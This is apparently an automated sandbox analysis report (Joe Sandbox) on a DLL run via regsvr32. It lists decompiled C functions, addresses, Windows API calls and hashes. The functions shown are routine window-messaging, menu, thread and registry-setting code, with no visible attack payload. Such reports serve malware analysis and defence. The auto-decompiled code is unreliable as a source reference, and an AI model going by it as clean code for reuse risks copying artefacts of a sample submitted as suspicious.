                                                                                                                                                                            				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                            					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
                                                                                                                                                                            				_t55 = _t45;
                                                                                                                                                                            				if(_t45 == 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					E1000A0DB(_t45, _t46, 0, _t51, _t55);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t7 = _t45 + 0x74; // 0x74
                                                                                                                                                                            				_t46 = _t7;
                                                                                                                                                                            				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
                                                                                                                                                                            				if(_t37 == 0) {
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                                                                                                                                            				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                                                                                                                                            				 *((short*)(_t51 + 0x92)) = 0;
                                                                                                                                                                            				 *((short*)(_t51 + 0x90)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                                                                                                                                            				return E10017C60(_t51);
                                                                                                                                                                            			}









                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adbc
                                                                                                                                                                            0x1000adc1
                                                                                                                                                                            0x1000adc3
                                                                                                                                                                            0x1000adc6
                                                                                                                                                                            0x1000adcd
                                                                                                                                                                            0x1000add0
                                                                                                                                                                            0x1000add3
                                                                                                                                                                            0x1000add9
                                                                                                                                                                            0x1000ade9
                                                                                                                                                                            0x1000addb
                                                                                                                                                                            0x1000adde
                                                                                                                                                                            0x1000ade3
                                                                                                                                                                            0x1000ade4
                                                                                                                                                                            0x1000ade4
                                                                                                                                                                            0x1000adf1
                                                                                                                                                                            0x1000adf3
                                                                                                                                                                            0x1000adf5
                                                                                                                                                                            0x1000adf7
                                                                                                                                                                            0x1000adf7
                                                                                                                                                                            0x1000adf7
                                                                                                                                                                            0x1000adfc
                                                                                                                                                                            0x1000adfc
                                                                                                                                                                            0x1000adff
                                                                                                                                                                            0x1000ae06
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ae08
                                                                                                                                                                            0x1000ae11
                                                                                                                                                                            0x1000ae1a
                                                                                                                                                                            0x1000ae1d
                                                                                                                                                                            0x1000ae20
                                                                                                                                                                            0x1000ae23
                                                                                                                                                                            0x1000ae26
                                                                                                                                                                            0x1000ae29
                                                                                                                                                                            0x1000ae2c
                                                                                                                                                                            0x1000ae2f
                                                                                                                                                                            0x1000ae32
                                                                                                                                                                            0x1000ae38
                                                                                                                                                                            0x1000ae3b
                                                                                                                                                                            0x1000ae42
                                                                                                                                                                            0x1000ae49
                                                                                                                                                                            0x1000ae4c
                                                                                                                                                                            0x1000ae52
                                                                                                                                                                            0x1000ae58
                                                                                                                                                                            0x1000ae5e
                                                                                                                                                                            0x1000ae61
                                                                                                                                                                            0x1000ae64
                                                                                                                                                                            0x1000ae6a
                                                                                                                                                                            0x1000ae70
                                                                                                                                                                            0x1000ae73
                                                                                                                                                                            0x1000ae76
                                                                                                                                                                            0x1000ae87

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1000ADBC
                                                                                                                                                                              • Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869
                                                                                                                                                                            • __strdup.LIBCMT ref: 1000ADDE
                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 1000AE0B
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1000AE14
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4206445780-0
                                                                                                                                                                            • Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                                                                                            • Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                                                                                            • Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E1001170E(intOrPtr* __ecx) {
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				intOrPtr* __esi;
                                                                                                                                                                            				struct HWND__* _t18;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __ecx;
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                            				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                                                                                                                                            					__eax =  *__esi;
                                                                                                                                                                            					__ecx = __esi;
                                                                                                                                                                            					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                                                                                                                                            				}
                                                                                                                                                                            				_t30 = SendMessageA;
                                                                                                                                                                            				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                                                                                            				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                                                                            				_t28 = _t33;
                                                                                                                                                                            				_t33 = E10010DEC(0, _t28, SendMessageA);
                                                                                                                                                                            				if(_t33 != 0) {
                                                                                                                                                                            					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                                                                                            					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                                                                            					_t18 = GetCapture();
                                                                                                                                                                            					if(_t18 != 0) {
                                                                                                                                                                            						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t18;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push(_t28);
                                                                                                                                                                            					_v20 = 0x10057298;
                                                                                                                                                                            					E10017C83( &_v20, 0x1002e2fc);
                                                                                                                                                                            					asm("int3");
                                                                                                                                                                            					_push(4);
                                                                                                                                                                            					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
                                                                                                                                                                            					_t29 = E10013965(0x104);
                                                                                                                                                                            					_v32 = _t29;
                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                            					if(_t29 != 0) {
                                                                                                                                                                            						_t24 = E1000CF71(_t29);
                                                                                                                                                                            					}
                                                                                                                                                                            					return E10017C60(_t24);
                                                                                                                                                                            				}
                                                                                                                                                                            			}












                                                                                                                                                                            0x1001170e
                                                                                                                                                                            0x1001170e
                                                                                                                                                                            0x10011710
                                                                                                                                                                            0x1001171d
                                                                                                                                                                            0x1001171f
                                                                                                                                                                            0x10011721
                                                                                                                                                                            0x10011723
                                                                                                                                                                            0x10011723
                                                                                                                                                                            0x10011729
                                                                                                                                                                            0x10011738
                                                                                                                                                                            0x10011745
                                                                                                                                                                            0x1001174a
                                                                                                                                                                            0x10011751
                                                                                                                                                                            0x10011755
                                                                                                                                                                            0x10011763
                                                                                                                                                                            0x10011770
                                                                                                                                                                            0x10011775
                                                                                                                                                                            0x1001177d
                                                                                                                                                                            0x10011784
                                                                                                                                                                            0x10011784
                                                                                                                                                                            0x10011789
                                                                                                                                                                            0x10011757
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123

                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageA.USER32 ref: 10011738
                                                                                                                                                                            • SendMessageA.USER32 ref: 10011763
                                                                                                                                                                              • Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                                                                                            • GetCapture.USER32 ref: 10011775
                                                                                                                                                                            • SendMessageA.USER32 ref: 10011784
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CaptureWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 729421689-0
                                                                                                                                                                            • Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                                                                                            • Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
                                                                                                                                                                            • Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                                                                                            • Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v24;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                            				CHAR* _t21;
                                                                                                                                                                            				char* _t24;
                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                            				void* _t30;
                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __edx;
                                                                                                                                                                            				_t13 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t13 ^ _t31;
                                                                                                                                                                            				_t24 = _a8;
                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                            				_t29 = _a4;
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                                                                                            					E10016DF0( &_v24, 0x10, "%d", _a12);
                                                                                                                                                                            					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t30 = E10013ED1(__ecx, _t29);
                                                                                                                                                                            					if(_t30 != 0) {
                                                                                                                                                                            						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                                                                                                                                            						_t29 = _t21;
                                                                                                                                                                            						RegCloseKey(_t30);
                                                                                                                                                                            						_t18 = 0 | _t21 == 0x00000000;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                                                                                            			}














                                                                                                                                                                            0x10013f17
                                                                                                                                                                            0x10013f1d
                                                                                                                                                                            0x10013f24
                                                                                                                                                                            0x10013f28
                                                                                                                                                                            0x10013f2c
                                                                                                                                                                            0x10013f33
                                                                                                                                                                            0x10013f36
                                                                                                                                                                            0x10013f76
                                                                                                                                                                            0x10013f87
                                                                                                                                                                            0x10013f38
                                                                                                                                                                            0x10013f3e
                                                                                                                                                                            0x10013f42
                                                                                                                                                                            0x10013f50
                                                                                                                                                                            0x10013f57
                                                                                                                                                                            0x10013f59
                                                                                                                                                                            0x10013f63
                                                                                                                                                                            0x10013f63
                                                                                                                                                                            0x10013f42
                                                                                                                                                                            0x10013f9b

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10013F59
                                                                                                                                                                            • _swprintf.LIBCMT ref: 10013F76
                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4210924919-0
                                                                                                                                                                            • Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                                                                                            • Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                                                                                            • Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* _t16;
                                                                                                                                                                            				int _t17;
                                                                                                                                                                            				int _t18;
                                                                                                                                                                            				struct HWND__* _t19;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            
                                                                                                                                                                            				_t32 = __edi;
                                                                                                                                                                            				_t35 = __ecx;
                                                                                                                                                                            				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                            					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						L3:
                                                                                                                                                                            						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
                                                                                                                                                                            						L4:
                                                                                                                                                                            						asm("sbb edx, edx");
                                                                                                                                                                            						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                                                                                                                                            						L11:
                                                                                                                                                                            						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                                                                                                                                            						return _t18;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a4;
                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                            						_push(__edi);
                                                                                                                                                                            						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                                            						_t19 = GetFocus();
                                                                                                                                                                            						__eflags = _t19 -  *(_t33 + 0x20);
                                                                                                                                                                            						if(_t19 ==  *(_t33 + 0x20)) {
                                                                                                                                                                            							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                                                                                                                                            					goto L11;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                                                                                                            					_t17 =  *(__ecx + 8);
                                                                                                                                                                            					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                                            					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                                            						goto L4;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L3;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t16;
                                                                                                                                                                            			}












                                                                                                                                                                            0x1000b244
                                                                                                                                                                            0x1000b246
                                                                                                                                                                            0x1000b248
                                                                                                                                                                            0x1000b24f
                                                                                                                                                                            0x1000b284
                                                                                                                                                                            0x1000b287
                                                                                                                                                                            0x1000b25e
                                                                                                                                                                            0x1000b25e
                                                                                                                                                                            0x1000b263
                                                                                                                                                                            0x1000b269
                                                                                                                                                                            0x1000b27c
                                                                                                                                                                            0x1000b2c7
                                                                                                                                                                            0x1000b2c7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000b2c7
                                                                                                                                                                            0x1000b289
                                                                                                                                                                            0x1000b28d
                                                                                                                                                                            0x1000b28f
                                                                                                                                                                            0x1000b290
                                                                                                                                                                            0x1000b293
                                                                                                                                                                            0x1000b299
                                                                                                                                                                            0x1000b29c
                                                                                                                                                                            0x1000b2b4
                                                                                                                                                                            0x1000b2b4
                                                                                                                                                                            0x1000b2ba
                                                                                                                                                                            0x1000b2c2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000b2c2
                                                                                                                                                                            0x1000b254
                                                                                                                                                                            0x1000b256
                                                                                                                                                                            0x1000b259
                                                                                                                                                                            0x1000b25c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000b25c
                                                                                                                                                                            0x1000b2d0

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnableMenuItem.USER32 ref: 1000B27C
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            • GetFocus.USER32 ref: 1000B293
                                                                                                                                                                            • GetParent.USER32(?), ref: 1000B2A1
                                                                                                                                                                            • SendMessageA.USER32 ref: 1000B2B4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3849708097-0
                                                                                                                                                                            • Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                                                                                            • Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
                                                                                                                                                                            • Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                                                                                            • Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                            			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                            				struct HWND__* _t18;
                                                                                                                                                                            				struct HWND__* _t20;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            				void* _t23;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                            
                                                                                                                                                                            				_t23 = __ecx;
                                                                                                                                                                            				_t22 = __ebx;
                                                                                                                                                                            				_t24 = GetTopWindow;
                                                                                                                                                                            				_t16 = GetTopWindow(_a4);
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t25 = _t16;
                                                                                                                                                                            					if(_t25 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a24;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						SendMessageA(_t25, _a8, _a12, _a16);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
                                                                                                                                                                            						__eflags = _t20;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_push(_a16);
                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                            							_push(_a8);
                                                                                                                                                                            							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                                                                                                                                            							_push(_t20);
                                                                                                                                                                            							E1001016F(_t22, _t24, _t25, __eflags);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a20;
                                                                                                                                                                            					if(_a20 != 0) {
                                                                                                                                                                            						_t18 = GetTopWindow(_t25);
                                                                                                                                                                            						__eflags = _t18;
                                                                                                                                                                            						if(_t18 != 0) {
                                                                                                                                                                            							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t16 = GetWindow(_t25, 2);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t16;
                                                                                                                                                                            			}













                                                                                                                                                                            0x1001044a
                                                                                                                                                                            0x1001044a
                                                                                                                                                                            0x10010452
                                                                                                                                                                            0x10010458
                                                                                                                                                                            0x100104bb
                                                                                                                                                                            0x100104bb
                                                                                                                                                                            0x100104bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001045c
                                                                                                                                                                            0x10010460
                                                                                                                                                                            0x1001048a
                                                                                                                                                                            0x10010462
                                                                                                                                                                            0x10010463
                                                                                                                                                                            0x10010468
                                                                                                                                                                            0x1001046a
                                                                                                                                                                            0x1001046c
                                                                                                                                                                            0x1001046f
                                                                                                                                                                            0x10010472
                                                                                                                                                                            0x10010475
                                                                                                                                                                            0x10010478
                                                                                                                                                                            0x10010479
                                                                                                                                                                            0x10010479
                                                                                                                                                                            0x1001046a
                                                                                                                                                                            0x10010490
                                                                                                                                                                            0x10010494
                                                                                                                                                                            0x10010497
                                                                                                                                                                            0x10010499
                                                                                                                                                                            0x1001049b
                                                                                                                                                                            0x100104ad
                                                                                                                                                                            0x100104ad
                                                                                                                                                                            0x1001049b
                                                                                                                                                                            0x100104b5
                                                                                                                                                                            0x100104b5
                                                                                                                                                                            0x100104c4

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 10010497
                                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 100104B5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2353593579-0
                                                                                                                                                                            • Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                                                                                            • Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
                                                                                                                                                                            • Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                                                                                            • Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
